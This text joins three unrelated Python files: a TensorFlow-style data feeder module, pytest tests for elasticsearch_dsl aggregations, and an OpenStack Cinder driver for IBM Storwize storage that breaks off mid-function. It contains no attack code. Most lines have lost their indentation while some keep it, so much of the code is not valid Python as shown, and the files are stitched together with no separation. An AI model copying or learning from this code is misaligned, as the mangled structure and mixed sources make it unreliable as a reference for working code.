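#     output_shape == [32, 3]
# since a one-hot class dimension is appended whenever n_classes > 1.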
def _data_type_filter(X, y):
"""Filter data types into acceptable format"""
if HAS_DASK:
X = extract_dask_data(X)
if y is not None:
y = extract_dask_labels(y)
if HAS_PANDAS:
X = extract_pandas_data(X)
if y is not None:
y = extract_pandas_labels(y)
return X, y
def _is_iterable(X):
return hasattr(X, 'next') or hasattr(X, '__next__')
def setup_train_data_feeder(X, y, n_classes, batch_size):
"""Create data feeder, to sample inputs from dataset.
If X and y are iterators, use StreamingDataFeeder.
Args:
X: numpy, pandas or Dask matrix or iterable.
y: numpy, pandas or Dask array or iterable.
n_classes: number of classes.
batch_size: size to split data into parts.
Returns:
DataFeeder object that returns training data.
"""
X, y = _data_type_filter(X, y)
if HAS_DASK:
import dask.dataframe as dd
allowed_classes = (dd.Series, dd.DataFrame)
if (isinstance(X, allowed_classes) and
(y is None or isinstance(y, allowed_classes))):
data_feeder_cls = DaskDataFeeder
else:
data_feeder_cls = DataFeeder
else:
data_feeder_cls = DataFeeder
if _is_iterable(X):
if y is not None and not _is_iterable(y):
raise ValueError('Both X and y should be iterators for '
'streaming learning to work.')
data_feeder_cls = StreamingDataFeeder
return data_feeder_cls(X, y, n_classes, batch_size)
def _batch_data(X, batch_size):
chunk = []
for data in X:
chunk.append(data)
if batch_size > 0 and len(chunk) >= batch_size:
yield np.matrix(chunk)
chunk = []
yield np.matrix(chunk)
def setup_predict_data_feeder(X, batch_size=-1):
"""Returns an iterable for feeding into predict step.
Args:
X: numpy, pandas, Dask array or iterable.
batch_size: Size of batches to split data into.
If negative, returns one batch of full size.
Returns:
List or iterator of parts of data to predict on.
"""
if HAS_DASK:
X = extract_dask_data(X)
if HAS_PANDAS:
X = extract_pandas_data(X)
if _is_iterable(X):
return _batch_data(X, batch_size)
if len(X.shape) == 1:
X = np.reshape(X, (-1, 1))
if batch_size > 0:
n_batches = int(math.ceil(float(len(X)) / batch_size))
return [X[i * batch_size:(i + 1) * batch_size] for i in xrange(n_batches)]
return [X]
def setup_processor_data_feeder(X):
"""Sets up processor iterable.
Args:
X: numpy, pandas or iterable.
Returns:
Iterable of data to process.
"""
if HAS_PANDAS:
X = extract_pandas_matrix(X)
return X
def check_array(array, dtype):
"""Checks array on dtype and convers it if different.
Args:
array: Input array.
dtype: Expected dtype.
Returns:
Original array or converted.
"""
array = np.array(array, dtype=dtype, order=None, copy=False)
return array
class DataFeeder(object):
"""Data feeder is an example class to sample data for TF trainer.
Parameters:
X: feature Nd numpy matrix of shape [n_samples, n_features, ...].
y: target vector, either floats for regression or class id for
classification. If matrix, will consider as a sequence
of targets. Can be None for unsupervised setting.
n_classes: number of classes, 0 and 1 are considered regression.
batch_size: mini batch size to accumulate.
random_state: numpy RandomState object to reproduce sampling.
Attributes:
X: input features.
y: input target.
n_classes: number of classes.
batch_size: mini batch size to accumulate.
input_shape: shape of the input.
output_shape: shape of the output.
input_dtype: dtype of input.
output_dtype: dtype of output.
"""
def __init__(self, X, y, n_classes, batch_size, random_state=None):
x_dtype = np.int64 if X.dtype == np.int64 else np.float32
y_dtype = np.int64 if n_classes > 1 else np.float32
self.X = check_array(X, dtype=x_dtype)
self.y = (None if y is None else check_array(y, dtype=y_dtype))
self.n_classes = n_classes
self.batch_size = batch_size
        y_shape = None if self.y is None else self.y.shape
        self.input_shape, self.output_shape = _get_in_out_shape(
            self.X.shape, y_shape, n_classes, batch_size)
# Input dtype matches dtype of X.
self.input_dtype = self.X.dtype
# Output dtype always float32 (because for classification we use
        # one-hot vectors).
self.output_dtype = np.float32
self.random_state = np.random.RandomState(
42) if random_state is None else random_state
self.indices = self.random_state.permutation(self.X.shape[0])
self.offset = 0
self.epoch = 0
self._epoch_placeholder = None
def make_epoch_variable(self):
"""Adds a placeholder variable for the epoch to the graph.
Returns:
The epoch placeholder.
"""
self._epoch_placeholder = array_ops.placeholder(dtypes.int32, [1],
name='epoch')
return self._epoch_placeholder
def input_builder(self):
"""Builds inputs in the graph.
Returns:
Two placeholders for inputs and outputs.
"""
input_shape = [None] + self.input_shape[1:]
self._input_placeholder = array_ops.placeholder(
dtypes.as_dtype(self.input_dtype),
input_shape,
name='input')
if self.output_shape is None:
self._output_placeholder = None
else:
output_shape = [None] + self.output_shape[1:]
self._output_placeholder = array_ops.placeholder(
dtypes.as_dtype(self.output_dtype),
output_shape,
name='output')
return self._input_placeholder, self._output_placeholder
def set_placeholders(self, input_placeholder, output_placeholder):
"""Sets placeholders for this data feeder.
Args:
input_placeholder: Placeholder for `X` variable. Should match shape
of the examples in the X dataset.
output_placeholder: Placeholder for `y` variable. Should match
shape of the examples in the y dataset. Can be None.
"""
self._input_placeholder = input_placeholder
self._output_placeholder = output_placeholder
def get_feed_params(self):
"""Function returns a dict with data feed params while training.
Returns:
A dict with data feed params while training.
"""
return {
'epoch': self.epoch,
'offset': self.offset,
'batch_size': self.batch_size
}
def get_feed_dict_fn(self):
"""Returns a function, that will sample data and provide it to given
placeholders.
Returns:
A function that when called samples a random subset of batch size
from X and y.
"""
        assert self._input_placeholder is not None
def _feed_dict_fn():
feed_dict = {}
if self._epoch_placeholder is not None:
feed_dict[self._epoch_placeholder.name] = self.epoch
# take random indices
batch_indices = self.indices[self.offset:self.offset + self.batch_size]
# assign input features from random indices
inp = np.array(self.X[batch_indices]).reshape((batch_indices.shape[0], 1)) \
if len(self.X.shape) == 1 else self.X[batch_indices]
feed_dict[self._input_placeholder.name] = inp
# move offset and reset it if necessary
self.offset += self.batch_size
if self.offset >= self.X.shape[0]:
self.indices = self.random_state.permutation(self.X.shape[0])
self.offset = 0
self.epoch += 1
# return early if there are no labels
if self._output_placeholder is None:
return feed_dict
# assign labels from random indices
self.output_shape[0] = batch_indices.shape[0]
out = np.zeros(self.output_shape, dtype=self.output_dtype)
for i in xrange(out.shape[0]):
sample = batch_indices[i]
if self.n_classes > 1:
if len(self.output_shape) == 2:
out.itemset((i, self.y[sample]), 1.0)
else:
for idx, value in enumerate(self.y[sample]):
out.itemset(tuple([i, idx, value]), 1.0)
else:
out[i] = self.y[sample]
feed_dict[self._output_placeholder.name] = out
return feed_dict
return _feed_dict_fn
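# ---------------------------------------------------------------------------
# Usage sketch (illustrative; shapes and class count are arbitrary):
#
#     X = np.random.rand(100, 5)
#     y = np.random.randint(0, 3, size=100)
#     feeder = DataFeeder(X, y, n_classes=3, batch_size=32)
#     input_ph, output_ph = feeder.input_builder()
#     feed_dict = feeder.get_feed_dict_fn()()   # one sampled batch,
#                                               # keyed by placeholder name
# ---------------------------------------------------------------------------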
class StreamingDataFeeder(DataFeeder):
"""Data feeder for TF trainer that reads data from iterator.
    Streaming data feeder allows reading data as it comes in, from disk or
    somewhere else. It's customary to have these iterators rotate infinitely
    over the dataset, to allow control of how much to learn on the trainer side.
Parameters:
        X: iterator that, for each element, returns features.
        y: iterator that, for each element, returns 1 or many classes /
regression values.
n_classes: indicator of how many classes the target has.
batch_size: Mini batch size to accumulate.
Attributes:
X: input features.
y: input target.
n_classes: number of classes.
batch_size: mini batch size to accumulate.
input_shape: shape of the input.
output_shape: shape of the output.
input_dtype: dtype of input.
output_dtype: dtype of output.
"""
def __init__(self, X, y, n_classes, batch_size):
X_first_el = six.next(X)
y_first_el = six.next(y)
self.X = itertools.chain([X_first_el], X)
self.y = itertools.chain([y_first_el], y)
self.n_classes = n_classes
self.batch_size = batch_size
self.input_shape, self.output_shape = _get_in_out_shape(
[1] + list(X_first_el.shape), [1] + list(y_first_el.shape), n_classes,
batch_size)
self.input_dtype = X_first_el.dtype
        # Convert float64 to float32, as all the parameters in the model are
        # float32 and there are many benefits to using it in NNs.
if self.input_dtype == np.float64:
self.input_dtype = np.float32
        # Output dtype is float32, to satisfy both softmax and regression needs.
self.output_dtype = np.float32
def get_feed_params(self):
"""Function returns a dict with data feed params while training.
Returns:
A dict with data feed params while training.
"""
return {'batch_size': self.batch_size}
def get_feed_dict_fn(self):
"""Returns a function, that will sample data and provide it to placeholders.
Returns:
A function that when called samples a random subset of batch size
from X and y.
"""
def _feed_dict_fn():
inp = np.zeros(self.input_shape, dtype=self.input_dtype)
out = np.zeros(self.output_shape, dtype=self.output_dtype)
for i in xrange(self.batch_size):
inp[i, :] = six.next(self.X)
y = six.next(self.y)
if self.n_classes > 1:
if len(self.output_shape) == 2:
out.itemset((i, y), 1.0)
else:
for idx, value in enumerate(y):
out.itemset(tuple([i, idx, value]), 1.0)
else:
out[i] = y
return {self._input_placeholder.name: inp,
self._output_placeholder.name: out}
return _feed_dict_fn
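# ---------------------------------------------------------------------------
# Usage sketch (illustrative; the generators are stand-ins for a real stream
# and rotate infinitely, as this class expects):
#
#     def x_stream():
#         while True:
#             yield np.random.rand(5)
#     def y_stream():
#         while True:
#             yield np.int64(np.random.randint(0, 3))
#     feeder = StreamingDataFeeder(x_stream(), y_stream(),
#                                  n_classes=3, batch_size=32)
#     feeder.input_builder()                  # inherited from DataFeeder
#     feed_dict = feeder.get_feed_dict_fn()()
# ---------------------------------------------------------------------------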
class DaskDataFeeder(object):
"""Data feeder for TF trainer that reads data from dask.Series and dask.DataFrame.
    Numpy arrays can be serialized to disk and it's possible to do random seeks
    into them. DaskDataFeeder removes the requirement to have the full dataset
    in memory and still allows random seeks for sampling of batches.
Parameters:
        X: dask.Series or dask.DataFrame of features.
        y: dask.Series or dask.DataFrame of targets (1 or many classes /
            regression values).
n_classes: indicator of how many classes the target has.
batch_size: Mini batch size to accumulate.
        random_state: random state for RNG. Note that it will mutate, so use an
            int value for this if you want consistently sized batches.
Attributes:
X: input features.
y: input target.
n_classes: number of classes.
batch_size: mini batch size to accumulate.
input_shape: shape of the input.
output_shape: shape of the output.
input_dtype: dtype of input.
output_dtype: dtype of output.
"""
def __init__(self, X, y, n_classes, batch_size, random_state=None):
import dask.dataframe as dd
# TODO: check X and y dtypes in dask_io like pandas
self.X = X
self.y = y
# save column names
self.X_columns = list(X.columns)
if isinstance(y.columns[0], str):
self.y_columns = list(y.columns)
else:
# deal with cases where two DFs have overlapped default numeric colnames
self.y_columns = len(self.X_columns) + 1
self.y = self.y.rename(columns={y.columns[0]: self.y_columns})
# combine into a data frame
self.df = dd.multi.concat([self.X, self.y], axis=1)
self.n_classes = n_classes
X_count = X.count().compute()[0]
X_shape = (X_count, len(self.X.columns))
y_shape = (X_count, len(self.y.columns))
self.sample_fraction = batch_size / float(X_count)
self.input_shape, self.output_shape = _get_in_out_shape(X_shape, y_shape,
n_classes,
batch_size)
# self.X.dtypes[0], self.y.dtypes[self.y_columns]
self.input_dtype, self.output_dtype = np.float32, np.float32
if random_state is None:
self.random_state = 66
else:
self.random_state = random_state
self.batch_size = batch_size
def get_feed_params(self):
"""Function returns a dict with data feed params while training.
Returns:
A dict with data feed params while training.
"""
return {'batch_size': self.batch_size}
def get_feed_dict_fn(self, input_placeholder, output_placeholder):
"""Returns a function, that will sample data and provide it to placeholders.
Args:
input_placeholder: tf.Placeholder for input features mini batch.
output_placeholder: tf.Placeholder for output targets.
Returns:
A function that when called samples a random subset of batch size
from X and y.
"""
def _feed_dict_fn():
# TODO: option for with/without replacement (dev version of dask)
sample = self.df.random_split(
[self.sample_fraction, 1 - self.sample_fraction],
random_state=self.random_state)
inp = extract_pandas_matrix(sample[0][self.X_columns].compute()).tolist()
out = extract_pandas_matrix(sample[0][self.y_columns].compute())
# convert to correct dtype
inp = np.array(inp, dtype=self.input_dtype)
# one-hot encode out for each class for cross entropy loss
if HAS_PANDAS:
import pandas as pd
if not isinstance(out, pd.Series):
out = out.flatten()
out_max = self.y.max().compute().values[0]
encoded_out = np.zeros((out.size, out_max + 1), dtype=self.output_dtype)
encoded_out[np.arange(out.size), out] = 1
return {input_placeholder.name: inp,
output_placeholder.name: encoded_out}
return _feed_dict_fn
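# ---------------------------------------------------------------------------
# Usage sketch (illustrative; requires dask and pandas):
#
#     import pandas as pd
#     import dask.dataframe as dd
#     X = dd.from_pandas(pd.DataFrame({'f1': range(100)}), npartitions=2)
#     y = dd.from_pandas(pd.DataFrame({'label': [i % 3 for i in range(100)]}),
#                        npartitions=2)
#     feeder = DaskDataFeeder(X, y, n_classes=3, batch_size=10)
# ---------------------------------------------------------------------------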
|
|
from elasticsearch_dsl import aggs, query
from pytest import raises
def test_repr():
max_score = aggs.Max(field='score')
a = aggs.A('terms', field='tags', aggs={'max_score': max_score})
assert "Terms(aggs={'max_score': Max(field='score')}, field='tags')" == repr(a)
def test_meta():
max_score = aggs.Max(field='score')
a = aggs.A('terms', field='tags', aggs={'max_score': max_score}, meta={'some': 'metadata'})
assert {
'terms': {'field': 'tags'},
'aggs': {'max_score': {'max': {'field': 'score'}}},
'meta': {'some': 'metadata'}
} == a.to_dict()
def test_meta_from_dict():
max_score = aggs.Max(field='score')
a = aggs.A('terms', field='tags', aggs={'max_score': max_score}, meta={'some': 'metadata'})
assert aggs.A(a.to_dict()) == a
def test_A_creates_proper_agg():
a = aggs.A('terms', field='tags')
assert isinstance(a, aggs.Terms)
assert a._params == {'field': 'tags'}
def test_A_handles_nested_aggs_properly():
max_score = aggs.Max(field='score')
a = aggs.A('terms', field='tags', aggs={'max_score': max_score})
assert isinstance(a, aggs.Terms)
assert a._params == {'field': 'tags', 'aggs': {'max_score': max_score}}
def test_A_passes_aggs_through():
a = aggs.A('terms', field='tags')
assert aggs.A(a) is a
def test_A_from_dict():
d = {
'terms': {'field': 'tags'},
'aggs': {'per_author': {'terms': {'field': 'author.raw'}}},
}
a = aggs.A(d)
assert isinstance(a, aggs.Terms)
assert a._params == {'field': 'tags', 'aggs': {'per_author': aggs.A('terms', field='author.raw')}}
assert a['per_author'] == aggs.A('terms', field='author.raw')
assert a.aggs.per_author == aggs.A('terms', field='author.raw')
def test_A_fails_with_incorrect_dict():
correct_d = {
'terms': {'field': 'tags'},
'aggs': {'per_author': {'terms': {'field': 'author.raw'}}},
}
with raises(Exception):
aggs.A(correct_d, field='f')
d = correct_d.copy()
del d['terms']
with raises(Exception):
aggs.A(d)
d = correct_d.copy()
d['xx'] = {}
with raises(Exception):
aggs.A(d)
def test_A_fails_with_agg_and_params():
a = aggs.A('terms', field='tags')
with raises(Exception):
aggs.A(a, field='score')
def test_buckets_are_nestable():
a = aggs.Terms(field='tags')
b = a.bucket('per_author', 'terms', field='author.raw')
assert isinstance(b, aggs.Terms)
assert b._params == {'field': 'author.raw'}
assert a.aggs == {'per_author': b}
def test_metric_inside_buckets():
a = aggs.Terms(field='tags')
b = a.metric('max_score', 'max', field='score')
# returns bucket so it's chainable
assert a is b
assert a.aggs['max_score'] == aggs.Max(field='score')
def test_buckets_equals_counts_subaggs():
a = aggs.Terms(field='tags')
a.bucket('per_author', 'terms', field='author.raw')
b = aggs.Terms(field='tags')
assert a != b
def test_buckets_to_dict():
a = aggs.Terms(field='tags')
a.bucket('per_author', 'terms', field='author.raw')
assert {
'terms': {'field': 'tags'},
'aggs': {'per_author': {'terms': {'field': 'author.raw'}}},
} == a.to_dict()
a = aggs.Terms(field='tags')
a.metric('max_score', 'max', field='score')
assert {
'terms': {'field': 'tags'},
'aggs': {'max_score': {'max': {'field': 'score'}}},
} == a.to_dict()
def test_nested_buckets_are_reachable_as_getitem():
a = aggs.Terms(field='tags')
b = a.bucket('per_author', 'terms', field='author.raw')
assert a['per_author'] is not b
assert a['per_author'] == b
def test_nested_buckets_are_settable_as_getitem():
a = aggs.Terms(field='tags')
b = a['per_author'] = aggs.A('terms', field='author.raw')
assert a.aggs['per_author'] is b
def test_filter_can_be_instantiated_using_positional_args():
a = aggs.Filter(query.Q('term', f=42))
assert {
'filter': {
'term': {'f': 42}
}
} == a.to_dict()
assert a == aggs.A('filter', query.Q('term', f=42))
def test_filter_aggregation_as_nested_agg():
a = aggs.Terms(field='tags')
a.bucket('filtered', 'filter', query.Q('term', f=42))
assert {
'terms': {'field': 'tags'},
'aggs': {
'filtered': {
'filter': {
'term': {'f': 42}
},
}
}
} == a.to_dict()
def test_filter_aggregation_with_nested_aggs():
a = aggs.Filter(query.Q('term', f=42))
a.bucket('testing', 'terms', field='tags')
assert {
'filter': {
'term': {'f': 42}
},
'aggs': {
'testing': {'terms': {'field': 'tags'}}
}
} == a.to_dict()
def test_filters_correctly_identifies_the_hash():
a = aggs.A('filters', filters={'group_a': {'term': {'group': 'a'}}, 'group_b': {'term': {'group': 'b'}}})
assert {
'filters': {
'filters': {
'group_a': {'term': {'group': 'a'}},
'group_b': {'term': {'group': 'b'}}
}
}
} == a.to_dict()
assert a.filters.group_a == query.Q('term', group='a')
def test_bucket_sort_agg():
bucket_sort_agg = aggs.BucketSort(
sort=[{"total_sales": {"order": "desc"}}],
size=3
)
assert bucket_sort_agg.to_dict() == {
"bucket_sort": {
"sort": [
{"total_sales": {"order": "desc"}}
],
"size": 3
}
}
a = aggs.DateHistogram(field='date', interval='month')
a.bucket('total_sales', 'sum', field='price')
a.bucket(
'sales_bucket_sort',
'bucket_sort',
sort=[{"total_sales": {"order": "desc"}}],
size=3
)
assert {
"date_histogram": {
"field": "date",
"interval": "month"
},
"aggs": {
"total_sales": {
"sum": {
"field": "price"
}
},
"sales_bucket_sort": {
"bucket_sort": {
"sort": [
{"total_sales": {"order": "desc"}}
],
"size": 3
}
}
}
} == a.to_dict()
def test_bucket_sort_agg_only_truncate():
bucket_sort_agg = aggs.BucketSort(**{'from': 1, 'size': 1})
assert bucket_sort_agg.to_dict() == {
"bucket_sort": {
"from": 1,
"size": 1
}
}
a = aggs.DateHistogram(field='date', interval='month')
a.bucket('bucket_truncate', 'bucket_sort', **{'from': 1, 'size': 1})
assert {
"date_histogram": {
"field": "date",
"interval": "month"
},
"aggs": {
"bucket_truncate": {
"bucket_sort": {
"from": 1,
"size": 1
}
}
}
} == a.to_dict()
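# Illustrative sketch, not part of the original suite: the same bucket/metric
# API composes with Search objects, so the aggregations tested above can be
# attached to a query (assumes elasticsearch_dsl.Search is available in this
# version).
def test_aggs_attach_to_search_sketch():
    from elasticsearch_dsl import Search
    s = Search()
    s.aggs.bucket('per_tag', 'terms', field='tags') \
        .metric('max_score', 'max', field='score')
    assert s.to_dict()['aggs'] == {
        'per_tag': {
            'terms': {'field': 'tags'},
            'aggs': {'max_score': {'max': {'field': 'score'}}},
        }
    }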
|
|
# Copyright 2013 IBM Corp.
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Volume driver for IBM Storwize family and SVC storage systems.
Notes:
1. If you specify both a password and a key file, this driver will use the
key file only.
2. When using a key file for authentication, it is up to the user or
system administrator to store the private key in a safe manner.
3. The defaults for creating volumes are "-rsize 2% -autoexpand
   -grainsize 256 -warning 0". These can be changed in the configuration
   file or by using volume types (recommended only for advanced users).

Limitations:
1. The driver expects CLI output in English; error messages may be in a
   localized format.
2. Clones and creating volumes from snapshots, where the source and target
are of different sizes, is not supported.
"""
import math
from oslo.config import cfg
from cinder import context
from cinder import exception
from cinder.openstack.common import excutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import loopingcall
from cinder import units
from cinder import utils
from cinder.volume.drivers.ibm.storwize_svc import helpers as storwize_helpers
from cinder.volume.drivers.san import san
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
storwize_svc_opts = [
cfg.StrOpt('storwize_svc_volpool_name',
default='volpool',
help='Storage system storage pool for volumes'),
cfg.IntOpt('storwize_svc_vol_rsize',
default=2,
help='Storage system space-efficiency parameter for volumes '
'(percentage)'),
cfg.IntOpt('storwize_svc_vol_warning',
default=0,
help='Storage system threshold for volume capacity warnings '
'(percentage)'),
cfg.BoolOpt('storwize_svc_vol_autoexpand',
default=True,
help='Storage system autoexpand parameter for volumes '
'(True/False)'),
cfg.IntOpt('storwize_svc_vol_grainsize',
default=256,
help='Storage system grain size parameter for volumes '
'(32/64/128/256)'),
cfg.BoolOpt('storwize_svc_vol_compression',
default=False,
help='Storage system compression option for volumes'),
cfg.BoolOpt('storwize_svc_vol_easytier',
default=True,
help='Enable Easy Tier for volumes'),
cfg.IntOpt('storwize_svc_vol_iogrp',
default=0,
help='The I/O group in which to allocate volumes'),
cfg.IntOpt('storwize_svc_flashcopy_timeout',
default=120,
help='Maximum number of seconds to wait for FlashCopy to be '
'prepared. Maximum value is 600 seconds (10 minutes)'),
cfg.StrOpt('storwize_svc_connection_protocol',
default='iSCSI',
help='Connection protocol (iSCSI/FC)'),
cfg.BoolOpt('storwize_svc_iscsi_chap_enabled',
default=True,
help='Configure CHAP authentication for iSCSI connections '
'(Default: Enabled)'),
cfg.BoolOpt('storwize_svc_multipath_enabled',
default=False,
help='Connect with multipath (FC only; iSCSI multipath is '
'controlled by Nova)'),
cfg.BoolOpt('storwize_svc_multihostmap_enabled',
default=True,
help='Allows vdisk to multi host mapping'),
]
CONF = cfg.CONF
CONF.register_opts(storwize_svc_opts)
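# Illustrative cinder.conf snippet (values are examples only; the driver
# path may vary by release) combining the options registered above with the
# san_* options inherited from san.SanDriver:
#
#   [DEFAULT]
#   volume_driver = cinder.volume.drivers.ibm.storwize_svc.StorwizeSVCDriver
#   san_ip = 10.0.0.1
#   san_login = superuser
#   san_password = passw0rd
#   storwize_svc_volpool_name = volpool
#   storwize_svc_connection_protocol = iSCSI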
class StorwizeSVCDriver(san.SanDriver):
"""IBM Storwize V7000 and SVC iSCSI/FC volume driver.
Version history:
1.0 - Initial driver
1.1 - FC support, create_cloned_volume, volume type support,
get_volume_stats, minor bug fixes
1.2.0 - Added retype
1.2.1 - Code refactor, improved exception handling
1.2.2 - Fix bug #1274123 (races in host-related functions)
    1.2.3 - Fix Fibre Channel connectivity: bug #1279758 (add delim to
            lsfabric, clear unused data from connections, ensure matching
            WWPNs by comparing lower case)
1.2.4 - Fix bug #1278035 (async migration/retype)
1.2.5 - Added support for manage_existing (unmanage is inherited)
"""
VERSION = "1.2.5"
VDISKCOPYOPS_INTERVAL = 600
def __init__(self, *args, **kwargs):
super(StorwizeSVCDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(storwize_svc_opts)
self._helpers = storwize_helpers.StorwizeHelpers(self._run_ssh)
self._vdiskcopyops = {}
self._vdiskcopyops_loop = None
self._state = {'storage_nodes': {},
'enabled_protocols': set(),
'compression_enabled': False,
'available_iogrps': [],
'system_name': None,
'system_id': None,
'code_level': None,
}
def do_setup(self, ctxt):
"""Check that we have all configuration details from the storage."""
LOG.debug(_('enter: do_setup'))
# Get storage system name, id, and code level
self._state.update(self._helpers.get_system_info())
# Validate that the pool exists
pool = self.configuration.storwize_svc_volpool_name
try:
self._helpers.get_pool_attrs(pool)
except exception.VolumeBackendAPIException:
msg = _('Failed getting details for pool %s') % pool
raise exception.InvalidInput(reason=msg)
# Check if compression is supported
self._state['compression_enabled'] = \
self._helpers.compression_enabled()
# Get the available I/O groups
self._state['available_iogrps'] = \
self._helpers.get_available_io_groups()
# Get the iSCSI and FC names of the Storwize/SVC nodes
self._state['storage_nodes'] = self._helpers.get_node_info()
# Add the iSCSI IP addresses and WWPNs to the storage node info
self._helpers.add_iscsi_ip_addrs(self._state['storage_nodes'])
self._helpers.add_fc_wwpns(self._state['storage_nodes'])
# For each node, check what connection modes it supports. Delete any
# nodes that do not support any types (may be partially configured).
to_delete = []
for k, node in self._state['storage_nodes'].iteritems():
if ((len(node['ipv4']) or len(node['ipv6']))
and len(node['iscsi_name'])):
node['enabled_protocols'].append('iSCSI')
self._state['enabled_protocols'].add('iSCSI')
if len(node['WWPN']):
node['enabled_protocols'].append('FC')
self._state['enabled_protocols'].add('FC')
if not len(node['enabled_protocols']):
to_delete.append(k)
for delkey in to_delete:
del self._state['storage_nodes'][delkey]
# Make sure we have at least one node configured
if not len(self._state['storage_nodes']):
msg = _('do_setup: No configured nodes.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
# Build the list of in-progress vdisk copy operations
if ctxt is None:
admin_context = context.get_admin_context()
else:
admin_context = ctxt.elevated()
volumes = self.db.volume_get_all_by_host(admin_context, self.host)
for volume in volumes:
metadata = self.db.volume_admin_metadata_get(admin_context,
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
ops = [tuple(x.split(':')) for x in curr_ops.split(';')]
self._vdiskcopyops[volume['id']] = ops
# if vdiskcopy exists in database, start the looping call
if len(self._vdiskcopyops) >= 1:
self._vdiskcopyops_loop = loopingcall.LoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
LOG.debug(_('leave: do_setup'))
def check_for_setup_error(self):
"""Ensure that the flags are set properly."""
LOG.debug(_('enter: check_for_setup_error'))
# Check that we have the system ID information
if self._state['system_name'] is None:
exception_msg = (_('Unable to determine system name'))
raise exception.VolumeBackendAPIException(data=exception_msg)
if self._state['system_id'] is None:
exception_msg = (_('Unable to determine system id'))
raise exception.VolumeBackendAPIException(data=exception_msg)
required_flags = ['san_ip', 'san_ssh_port', 'san_login',
'storwize_svc_volpool_name']
for flag in required_flags:
if not self.configuration.safe_get(flag):
raise exception.InvalidInput(reason=_('%s is not set') % flag)
# Ensure that either password or keyfile were set
if not (self.configuration.san_password or
self.configuration.san_private_key):
raise exception.InvalidInput(
reason=_('Password or SSH private key is required for '
'authentication: set either san_password or '
'san_private_key option'))
# Check that flashcopy_timeout is not more than 10 minutes
flashcopy_timeout = self.configuration.storwize_svc_flashcopy_timeout
if not (flashcopy_timeout > 0 and flashcopy_timeout <= 600):
raise exception.InvalidInput(
                reason=_('Illegal value %d specified for '
                         'storwize_svc_flashcopy_timeout: '
                         'valid values are between 1 and 600')
                % flashcopy_timeout)
opts = self._helpers.build_default_opts(self.configuration)
self._helpers.check_vdisk_opts(self._state, opts)
LOG.debug(_('leave: check_for_setup_error'))
def ensure_export(self, ctxt, volume):
"""Check that the volume exists on the storage.
The system does not "export" volumes as a Linux iSCSI target does,
and therefore we just check that the volume exists on the storage.
"""
volume_defined = self._helpers.is_vdisk_defined(volume['name'])
if not volume_defined:
LOG.error(_('ensure_export: Volume %s not found on storage')
% volume['name'])
def create_export(self, ctxt, volume):
model_update = None
return model_update
def remove_export(self, ctxt, volume):
pass
def validate_connector(self, connector):
"""Check connector for at least one enabled protocol (iSCSI/FC)."""
valid = False
if ('iSCSI' in self._state['enabled_protocols'] and
'initiator' in connector):
valid = True
if 'FC' in self._state['enabled_protocols'] and 'wwpns' in connector:
valid = True
if not valid:
msg = (_('The connector does not contain the required '
'information.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _get_vdisk_params(self, type_id, volume_type=None):
return self._helpers.get_vdisk_params(self.configuration, self._state,
type_id, volume_type=volume_type)
@utils.synchronized('storwize-host', external=True)
def initialize_connection(self, volume, connector):
"""Perform the necessary work so that an iSCSI/FC connection can
be made.
To be able to create an iSCSI/FC connection from a given host to a
volume, we must:
1. Translate the given iSCSI name or WWNN to a host name
2. Create new host on the storage system if it does not yet exist
3. Map the volume to the host if it is not already done
4. Return the connection information for relevant nodes (in the
proper I/O group)
"""
LOG.debug(_('enter: initialize_connection: volume %(vol)s with '
'connector %(conn)s') % {'vol': volume, 'conn': connector})
vol_opts = self._get_vdisk_params(volume['volume_type_id'])
volume_name = volume['name']
# Delete irrelevant connection information that later could result
# in unwanted behaviour. For example, if FC is used yet the hosts
        # return iSCSI data, the driver will try to create the iSCSI
        # connection, which can fail with an error about reaching the
        # per-host maximum iSCSI initiator limit.
# First make a copy so we don't mess with a caller's connector.
connector = connector.copy()
if vol_opts['protocol'] == 'FC':
connector.pop('initiator', None)
elif vol_opts['protocol'] == 'iSCSI':
connector.pop('wwnns', None)
connector.pop('wwpns', None)
# Check if a host object is defined for this host name
host_name = self._helpers.get_host_from_connector(connector)
if host_name is None:
# Host does not exist - add a new host to Storwize/SVC
host_name = self._helpers.create_host(connector)
if vol_opts['protocol'] == 'iSCSI':
chap_secret = self._helpers.get_chap_secret_for_host(host_name)
chap_enabled = self.configuration.storwize_svc_iscsi_chap_enabled
if chap_enabled and chap_secret is None:
chap_secret = self._helpers.add_chap_secret_to_host(host_name)
elif not chap_enabled and chap_secret:
LOG.warning(_('CHAP secret exists for host but CHAP is '
'disabled'))
volume_attributes = self._helpers.get_vdisk_attributes(volume_name)
if volume_attributes is None:
msg = (_('initialize_connection: Failed to get attributes'
' for volume %s') % volume_name)
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
multihostmap = self.configuration.storwize_svc_multihostmap_enabled
lun_id = self._helpers.map_vol_to_host(volume_name, host_name,
multihostmap)
try:
preferred_node = volume_attributes['preferred_node_id']
IO_group = volume_attributes['IO_group_id']
except KeyError as e:
LOG.error(_('Did not find expected column name in '
'lsvdisk: %s') % e)
msg = (_('initialize_connection: Missing volume '
'attribute for volume %s') % volume_name)
raise exception.VolumeBackendAPIException(data=msg)
try:
# Get preferred node and other nodes in I/O group
preferred_node_entry = None
io_group_nodes = []
for node in self._state['storage_nodes'].itervalues():
if vol_opts['protocol'] not in node['enabled_protocols']:
continue
if node['id'] == preferred_node:
preferred_node_entry = node
if node['IO_group'] == IO_group:
io_group_nodes.append(node)
if not len(io_group_nodes):
msg = (_('initialize_connection: No node found in '
'I/O group %(gid)s for volume %(vol)s') %
{'gid': IO_group, 'vol': volume_name})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
if not preferred_node_entry and not vol_opts['multipath']:
# Get 1st node in I/O group
